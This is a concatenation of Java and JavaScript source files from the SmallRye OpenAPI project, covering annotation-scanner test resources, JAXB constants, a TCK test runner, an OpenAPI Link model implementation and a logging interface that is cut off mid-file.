<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Lizard.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.json.bind.annotation.JsonbPropertyOrder;
@JsonbPropertyOrder(value = { "type", "lovesRocks" })
public class Lizard extends AbstractPet {
boolean lovesRocks;
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/constants/JaxbConstants.java<|end_filename|>
package io.smallrye.openapi.api.constants;
import java.util.Arrays;
import java.util.List;
import org.jboss.jandex.DotName;
/**
* Constants related to the JAXB Specification
*
* @author <NAME> (<EMAIL>)
* @author <NAME> (<EMAIL>)
*/
public class JaxbConstants {
public static final List<DotName> JAXB_ELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.JAXBElement"),
DotName.createSimple("jakarta.xml.bind.JAXBElement"));
public static final List<DotName> XML_TYPE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlType"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlType"));
public static final List<DotName> XML_ELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlElement"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlElement"));
public static final List<DotName> XML_ATTRIBUTE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlAttribute"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlAttribute"));
public static final List<DotName> XML_ACCESSOR_TYPE = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlAccessorType"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlAccessorType"));
public static final List<DotName> XML_TRANSIENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlTransient"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlTransient"));
public static final List<DotName> XML_ROOTELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlRootElement"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlRootElement"));
public static final List<DotName> XML_WRAPPERELEMENT = Arrays.asList(
DotName.createSimple("javax.xml.bind.annotation.XmlElementWrapper"),
DotName.createSimple("jakarta.xml.bind.annotation.XmlElementWrapper"));
public static final String PROP_NAME = "name";
private JaxbConstants() {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseTypeUnindexedTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/unindexed")
public class ResponseTypeUnindexedTestResource {
// This type will not be in the Jandex index, nor does it implement Map or List.
static class ThirdPartyType {
}
@GET
@Produces(value = MediaType.TEXT_PLAIN)
public ThirdPartyType hello() {
return null;
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/LogCapture.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogRecord;
import java.util.logging.Logger;
import org.junit.jupiter.api.extension.AfterEachCallback;
import org.junit.jupiter.api.extension.BeforeEachCallback;
import org.junit.jupiter.api.extension.ExtensionContext;
/**
* Capture logs from a named logger and make them available to the test
* <p>
* <code><pre>
* @RegisterExtension
* LogCapture c = new LogCapture(ClassUnderTest.class.getName());
*
* @Test
* public void test() {
* // do something to provoke a log message
* new ClassUnderTest().logMyMessage();
*
* LogRecord r = c.assertLogContaining("My Special Message");
* assertEquals(Level.INFO, r.getLevel());
* }
* </pre></code>
*/
public class LogCapture implements BeforeEachCallback, AfterEachCallback {
private String loggerName;
private Logger logger;
private TestHandler handler;
private Level oldLevel;
public LogCapture(String loggerName) {
this.loggerName = loggerName;
}
@Override
public void beforeEach(ExtensionContext context) throws Exception {
logger = Logger.getLogger(loggerName);
handler = new TestHandler();
logger.addHandler(handler);
oldLevel = logger.getLevel();
logger.setLevel(Level.ALL);
}
@Override
public void afterEach(ExtensionContext context) throws Exception {
if (handler != null) {
logger.removeHandler(handler);
}
if (logger != null) {
logger.setLevel(oldLevel);
}
}
public List<LogRecord> getAll() {
synchronized (handler.records) {
return new ArrayList<>(handler.records);
}
}
public LogRecord assertLogContaining(String substring) {
synchronized (handler.records) {
for (LogRecord r : handler.records) {
if (r.getMessage().contains(substring)) {
return r;
}
}
StringBuilder sb = new StringBuilder();
sb.append("Log containing \"").append(substring).append("\" was not found.");
sb.append("\n");
sb.append("Log records recorded:\n");
if (handler.records.isEmpty()) {
sb.append("<no records>\n");
}
for (LogRecord r : handler.records) {
sb.append("[").append(r.getLevel()).append("] ");
sb.append(r.getMessage()).append("\n");
}
throw new AssertionError(sb.toString());
}
}
private static class TestHandler extends Handler {
private List<LogRecord> records = Collections.synchronizedList(new ArrayList<>());
@Override
public void publish(LogRecord record) {
records.add(record);
}
@Override
public void flush() {
}
@Override
public void close() throws SecurityException {
}
}
}
<|start_filename|>testsuite/extra/src/test/java/test/io/smallrye/openapi/tck/ExtraTestRunner.java<|end_filename|>
/**
* Copyright 2018 Red Hat, Inc, and individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package test.io.smallrye.openapi.tck;
import java.io.File;
import java.io.FileWriter;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.ParameterizedType;
import java.security.AccessController;
import java.security.PrivilegedAction;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Comparator;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import org.apache.commons.io.IOUtils;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.testng.Arquillian;
import org.jboss.jandex.IndexView;
import org.jboss.shrinkwrap.api.Archive;
import org.junit.jupiter.api.Assertions;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Ignore;
import org.testng.annotations.Test;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.runtime.OpenApiProcessor;
import io.smallrye.openapi.runtime.OpenApiStaticFile;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.io.OpenApiSerializer;
/**
* A test runner used to quickly run the OpenAPI extra tests directly against the
* {@link OpenApiDocument} without spinning up an MP compliant server. This is used
* as a helper for generating and running Junit DynamicTests from ExtraSuiteTestBase.
*
* @author <EMAIL>
*/
@SuppressWarnings("rawtypes")
public class ExtraTestRunner {
private Class<?> testClass;
private Class<? extends Arquillian> nestedTestClass;
public static Map<Class, OpenAPI> OPEN_API_DOCS = new HashMap<>();
/**
* Constructor.
*
* @param testClass
* @throws InitializationError
*/
public ExtraTestRunner(Class<?> testClass) throws Exception {
this.testClass = testClass;
this.nestedTestClass = determineTestClass(testClass);
// The Archive (shrinkwrap deployment)
Archive archive = archive();
// MPConfig
OpenApiConfig config = ArchiveUtil.archiveToConfig(archive);
IndexView index = ArchiveUtil.archiveToIndex(config, archive);
OpenApiStaticFile staticFile = ArchiveUtil.archiveToStaticFile(archive);
OpenAPI openAPI = OpenApiProcessor.bootstrap(config, index, getContextClassLoader(), staticFile);
Assertions.assertNotNull(openAPI, "Generated OAI document must not be null.");
OPEN_API_DOCS.put(testClass, openAPI);
// Output the /openapi content to a file for debugging purposes
File parent = new File("target", "testsuite-extra");
if (!parent.exists()) {
parent.mkdir();
}
File file = new File(parent, testClass.getName() + ".json");
String content = OpenApiSerializer.serialize(openAPI, Format.JSON);
try (FileWriter writer = new FileWriter(file)) {
IOUtils.write(content, writer);
}
}
/**
* Creates and returns the shrinkwrap archive for this test.
*/
private Archive archive() throws Exception {
Method[] methods = nestedTestClass.getMethods();
for (Method method : methods) {
if (method.isAnnotationPresent(Deployment.class)) {
Archive archive = (Archive) method.invoke(null);
return archive;
}
}
throw ExtraSuiteMessages.msg.missingDeploymentArchive();
}
/**
* Figures out what test class is being run.
*
* @throws InitializationError
*/
@SuppressWarnings("unchecked")
private Class<? extends Arquillian> determineTestClass(Class<?> testClass) {
ParameterizedType ptype = (ParameterizedType) testClass.getGenericSuperclass();
Class cc = (Class) ptype.getActualTypeArguments()[0];
return cc;
}
List<ExtraSuiteGeneratedTestProxy> getChildren() {
List<ExtraSuiteGeneratedTestProxy> children = new ArrayList<>();
Method[] methods = nestedTestClass.getMethods();
for (Method method : methods) {
if (method.isAnnotationPresent(Test.class)) {
try {
Object theTestObj = this.testClass.newInstance();
Arquillian delegate = createDelegate(theTestObj);
Test testAnnotation = method.getAnnotation(Test.class);
String providerMethodName = testAnnotation.dataProvider();
Method providerMethod = null;
for (Method m : nestedTestClass.getMethods()) {
if (m.isAnnotationPresent(DataProvider.class)) {
DataProvider provider = m.getAnnotation(DataProvider.class);
if (provider.name().equals(providerMethodName)) {
providerMethod = m;
break;
}
}
}
if (method.getParameterCount() > 0 && providerMethod != null) {
Object[][] args = (Object[][]) providerMethod.invoke(delegate);
for (Object[] arg : args) {
children.add(ExtraSuiteGeneratedTestProxy.create(delegate, theTestObj, method, arg));
}
} else {
children.add(ExtraSuiteGeneratedTestProxy.create(delegate, theTestObj, method, new Object[0]));
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
}
children.sort(new Comparator<ExtraSuiteGeneratedTestProxy>() {
@Override
public int compare(ExtraSuiteGeneratedTestProxy o1, ExtraSuiteGeneratedTestProxy o2) {
return o1.getTestMethod().getName().compareTo(o2.getTestMethod().getName());
}
});
return children;
}
/**
* Creates the delegate test instance. This is done by instantiating the test itself
* and calling its "getDelegate()" method. If no such method exists then an error
* is thrown.
*/
private Arquillian createDelegate(Object testObj) throws Exception {
Object delegate = testObj.getClass().getMethod("getDelegate").invoke(testObj);
return (Arquillian) delegate;
}
String describeChild(ExtraSuiteGeneratedTestProxy child) {
StringBuilder name = new StringBuilder(child.getTestMethod().getName());
if (child.getArguments().length > 0) {
name.append(' ');
name.append(Arrays.stream(child.getArguments()).map(Object::toString).collect(Collectors.joining(",")));
}
return name.toString();
}
protected void runChild(final ExtraSuiteGeneratedTestProxy child) throws Throwable {
OpenApiDocument.INSTANCE.set(ExtraTestRunner.OPEN_API_DOCS.get(child.getTest().getClass()));
if (isIgnored(child)) {
return;
}
try {
Method testMethod = child.getTestMethod();
testMethod.invoke(child.getDelegate(), child.getArguments());
} catch (InvocationTargetException e) {
Throwable cause = e.getCause();
Test testAnno = child.getTestMethod().getAnnotation(Test.class);
Class[] expectedExceptions = testAnno.expectedExceptions();
if (expectedExceptions != null && expectedExceptions.length > 0) {
Class expectedException = expectedExceptions[0];
Assertions.assertEquals(expectedException, cause.getClass());
} else {
throw cause;
}
}
}
boolean isIgnored(ExtraSuiteGeneratedTestProxy child) {
Method testMethod = child.getTestMethod();
if (testMethod.isAnnotationPresent(Ignore.class)) {
return true;
}
Method testMethodOverride;
try {
testMethodOverride = testClass.getMethod(testMethod.getName(), testMethod.getParameterTypes());
return testMethodOverride.isAnnotationPresent(Ignore.class);
} catch (NoSuchMethodException | SecurityException e) {
// Ignore, no override has been specified in the ExtraSuiteTestBase subclass
}
return false;
}
private static ClassLoader getContextClassLoader() {
if (System.getSecurityManager() == null) {
return Thread.currentThread().getContextClassLoader();
}
return AccessController
.doPrivileged((PrivilegedAction<ClassLoader>) () -> Thread.currentThread().getContextClassLoader());
}
}
<|start_filename|>testsuite/tck/src/test/java/io/smallrye/openapi/tck/AfterDeployObserver.java<|end_filename|>
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.openapi.tck;
import org.jboss.arquillian.container.spi.event.container.AfterDeploy;
import org.jboss.arquillian.core.api.annotation.Observes;
import io.restassured.RestAssured;
/**
* This sets the RestAssured.basePath to the Arquillian generated archive name, mapped to the context root.
*/
public class AfterDeployObserver {
public void afterDeploy(@Observes final AfterDeploy afterDeploy) {
RestAssured.basePath = afterDeploy.getDeployment().getArchive().getName();
}
}
<|start_filename|>ui/open-api-ui-forms/src/index.js<|end_filename|>
import React from "react";
import ReactDOM from "react-dom";
import MyOpenAPIForm from "./App";
ReactDOM.render(
<MyOpenAPIForm />,
document.getElementById('rrr')
);
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/RolesAllowedResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.annotation.security.DenyAll;
import jakarta.annotation.security.PermitAll;
import jakarta.annotation.security.RolesAllowed;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.Response;
@Path(value = "/v1")
@RolesAllowed(value = "admin")
@SuppressWarnings(value = "unused")
public class RolesAllowedResource1 {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
public Response getSecuredData(int id) {
return null;
}
@GET
@Path(value = "open")
@Produces(value = "application/json")
@PermitAll
public Response getOpenData(int id) {
return null;
}
@GET
@Path(value = "locked")
@Produces(value = "application/json")
@DenyAll
public Response getLockedData(int id) {
return null;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/links/LinkImpl.java<|end_filename|>
package io.smallrye.openapi.api.models.links;
import java.util.LinkedHashMap;
import java.util.Map;
import org.eclipse.microprofile.openapi.models.links.Link;
import org.eclipse.microprofile.openapi.models.servers.Server;
import io.smallrye.openapi.api.constants.OpenApiConstants;
import io.smallrye.openapi.api.models.ExtensibleImpl;
import io.smallrye.openapi.api.models.ModelImpl;
import io.smallrye.openapi.runtime.util.ModelUtil;
/**
* An implementation of the {@link Link} OpenAPI model interface.
*/
public class LinkImpl extends ExtensibleImpl<Link> implements Link, ModelImpl {
private String ref;
private String operationRef;
private String operationId;
private Map<String, Object> parameters;
private Object requestBody;
private String description;
private Server server;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return this.ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
if (ref != null && !ref.contains("/")) {
ref = OpenApiConstants.REF_PREFIX_LINK + ref;
}
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getServer()
*/
@Override
public Server getServer() {
return this.server;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public void setServer(Server server) {
this.server = server;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getOperationRef()
*/
@Override
public String getOperationRef() {
return this.operationRef;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setOperationRef(java.lang.String)
*/
@Override
public void setOperationRef(String operationRef) {
this.operationRef = operationRef;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getRequestBody()
*/
@Override
public Object getRequestBody() {
return this.requestBody;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setRequestBody(java.lang.Object)
*/
@Override
public void setRequestBody(Object requestBody) {
this.requestBody = requestBody;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getOperationId()
*/
@Override
public String getOperationId() {
return this.operationId;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setOperationId(java.lang.String)
*/
@Override
public void setOperationId(String operationId) {
this.operationId = operationId;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getParameters()
*/
@Override
public Map<String, Object> getParameters() {
return ModelUtil.unmodifiableMap(this.parameters);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setParameters(java.util.Map)
*/
@Override
public void setParameters(Map<String, Object> parameters) {
this.parameters = ModelUtil.replace(parameters, LinkedHashMap<String, Object>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#addParameter(java.lang.String, java.lang.Object)
*/
@Override
public Link addParameter(String name, Object parameter) {
this.parameters = ModelUtil.add(name, parameter, this.parameters, LinkedHashMap<String, Object>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#removeParameter(java.lang.String)
*/
@Override
public void removeParameter(String name) {
ModelUtil.remove(this.parameters, name);
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.links.Link#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
}
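// Illustrative sketch (added, not part of the original source): populating a link through the
// mutators defined above. Only methods declared in this class are used; the operation id, the
// "$response.body#/id" runtime expression and the description are hypothetical example values.
//
//   LinkImpl link = new LinkImpl();
//   link.setOperationId("getUserById");
//   link.addParameter("userId", "$response.body#/id");
//   link.setDescription("Link from the create-user response to the get-user operation");
//
// getParameters() would then expose the single entry through an unmodifiable map, mirroring the
// ModelUtil-based storage used throughout this class.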
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Apple.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Apple {
public String name;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Lizard.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class Lizard extends AbstractAnimal implements Reptile {
@Schema(deprecated = true)
static String scaleColor;
boolean lovesRocks;
@Override
public String getScaleColor() {
return "green";
}
public void setScaleColor(String scaleColor) {
// Bad idea, but doing it anyway ;-)
Lizard.scaleColor = scaleColor;
}
public void setAge(String age) {
super.setAge(Integer.parseInt(age));
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamAddon.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.HeaderParam;
public interface BeanParamAddon {
@HeaderParam(value = "hi1")
void setHeaderParam1(String value);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/TestEnum.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
public enum TestEnum {
ABC,
DEF
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterInBeanFromSetterTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
@Path(value = "/parameter-in-bean-from-setter/{id}/{id2}")
@SuppressWarnings(value = "unused")
public class ParameterInBeanFromSetterTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN-FROM-SETTER")
String id;
}
private Bean param;
@BeanParam
public void setParam(Bean param) {
this.param = param;
}
@GET
@Produces(value = MediaType.APPLICATION_JSON)
public Widget get(@PathParam(value = "id2") String id2) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipleContentTypesWithFormParamsTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.FormParam;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.Operation;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.parameters.RequestBody;
@Path(value = "/multiple-content-types-with-form-params")
@SuppressWarnings(value = "unused")
public class MultipleContentTypesWithFormParamsTestResource {
@POST
@Path(value = "/widgets/create")
@Consumes(value = MediaType.APPLICATION_JSON)
@Operation(operationId = "createWidget")
public void createWidget(
@RequestBody(required = true, content = @Content(schema = @Schema(implementation = Widget.class))) final Widget w) {
}
@POST
@Path(value = "/widgets/create")
@Consumes(value = MediaType.APPLICATION_FORM_URLENCODED)
@Operation(operationId = "createWidget")
public void createWidget(@FormParam(value = "id") String id, @FormParam(value = "name") String name) {
}
}
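// Note (added, hedged): both methods above deliberately share operationId "createWidget", so the
// annotation scanner is expected to merge them into a single POST operation whose request body
// offers two content types, application/json and application/x-www-form-urlencoded.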
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/BeanParamImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.CookieParam;
public class BeanParamImpl extends BeanParamBase implements BeanParamAddon {
@CookieParam(value = "cc1")
String cc1;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/User.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.validation.constraints.Max;
import jakarta.validation.constraints.Positive;
public interface User {
@Positive
@Max(value = 9999)
Integer getId();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Policy437Resource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
@Path(value = "/")
public class Policy437Resource {
@GET
@Path(value = "/beanparamimpl")
public Policy437 getWithBeanParams() {
return null;
}
}
<|start_filename|>testsuite/extra/src/test/java/io/smallrye/openapi/tck/extra/ComplexResourceTest.java<|end_filename|>
/*
* Copyright 2018 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.openapi.tck.extra;
import static org.hamcrest.Matchers.equalTo;
import org.eclipse.microprofile.openapi.tck.AppTestBase;
import org.jboss.arquillian.container.test.api.Deployment;
import org.jboss.arquillian.container.test.api.RunAsClient;
import org.jboss.shrinkwrap.api.ShrinkWrap;
import org.jboss.shrinkwrap.api.spec.WebArchive;
import org.testng.annotations.Test;
import io.restassured.response.ValidatableResponse;
import test.io.smallrye.openapi.tck.ExtraSuiteTestBase;
/**
 * NOTE: This is not a TCK test; it only leverages the TCK test setup.
*
* @author <NAME>, <EMAIL>
* <br>
* Date: 4/19/18
*/
public class ComplexResourceTest extends ExtraSuiteTestBase<ComplexResourceTest.ComplexResourceTestArquillian> {
public static class ComplexResourceTestArquillian extends AppTestBase {
@Deployment(name = "complexTypes")
public static WebArchive createDeployment() {
return ShrinkWrap.create(WebArchive.class, "airlines.war")
.addPackages(true, new String[] { "io.smallrye.openapi.tck.extra.complex" })
.addAsManifestResource("openapi.yaml", "openapi.yaml");
}
@RunAsClient
@Test(dataProvider = "formatProvider")
public void testArray(String type) {
ValidatableResponse vr = this.callEndpoint(type);
String arraySchema = "paths.'/complex/array'.post.requestBody.content.'application/json'.schema";
vr.body(arraySchema + ".type", equalTo("array"));
vr.body(arraySchema + ".items.format", equalTo("int32"));
vr.body(arraySchema + ".items.type", equalTo("integer"));
}
@RunAsClient
@Test(dataProvider = "formatProvider")
public void testList(String type) {
ValidatableResponse vr = this.callEndpoint(type);
String arraySchema = "paths.'/complex/list'.post.requestBody.content.'application/json'.schema";
vr.body(arraySchema + ".type", equalTo("array"));
vr.body(arraySchema + ".items.format", equalTo("int32"));
vr.body(arraySchema + ".items.type", equalTo("integer"));
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/dataobject/BeanValidationResourceTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner.dataobject;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.runtime.scanner.IndexScannerTestBase;
import io.smallrye.openapi.runtime.scanner.OpenApiAnnotationScanner;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class BeanValidationResourceTest extends IndexScannerTestBase {
@Test
void testJavaxBeanValidationDocument() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestResource.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestResourceEntity.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BVTestContainer.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.TestEnum.class);
testBeanValidationDocument(index);
}
@Test
void testJakartaBeanValidationDocument() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestResource.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestResourceEntity.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BVTestContainer.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.TestEnum.class);
testBeanValidationDocument(index);
}
void testBeanValidationDocument(Index index) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("dataobject/resource.testBeanValidationDocument.json", result);
}
@Test
void testJavaxInheritedBVConstraints() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.User.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.BaseUser.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.UserImpl.class);
testInheritedBVConstraints(index);
}
@Test
void testJakartaInheritedBVConstraints() throws IOException, JSONException {
Index index = indexOf(test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.User.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.BaseUser.class,
test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta.UserImpl.class);
testInheritedBVConstraints(index);
}
void testInheritedBVConstraints(Index index) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("dataobject/schema.inherited-bv-constraints.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/BaseUser.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
public abstract class BaseUser {
@Min(value = 10)
@NotNull
protected Integer id;
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/IoLogging.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import org.jboss.jandex.Type;
import org.jboss.logging.BasicLogger;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.Cause;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
public interface IoLogging extends BasicLogger {
IoLogging logger = Logger.getMessageLogger(IoLogging.class, IoLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2000, value = "Processing a map of %s annotations.")
void annotationsMap(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2001, value = "Processing a json map of %s nodes.")
void jsonNodeMap(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2002, value = "Processing a list of %s annotations.")
void annotationsList(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2003, value = "Processing a json list of %s.")
void jsonList(String of);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2004, value = "Processing a single %s annotation.")
void singleAnnotation(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2005, value = "Processing an %s annotation.")
void annotation(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2006, value = "Processing a single %s annotation as a %s.")
void singleAnnotationAs(String annotation, String as);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2007, value = "Processing a single %s json node.")
void singleJsonNode(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2008, value = "Processing an %s json node.")
void jsonNode(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2009, value = "Processing a single %s json object.")
void singleJsonObject(String node);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2010, value = "Processing a json map of %s.")
void jsonMap(String node);
@LogMessage(level = Logger.Level.ERROR)
@Message(id = 2011, value = "Error reading a CallbackOperation annotation.")
void readingCallbackOperation(@Cause Throwable cause);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2012, value = "Processing a list of %s annotations into an %s.")
void annotationsListInto(String annotation, String into);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2013, value = "Processing an enum %s")
void enumProcessing(Type type);
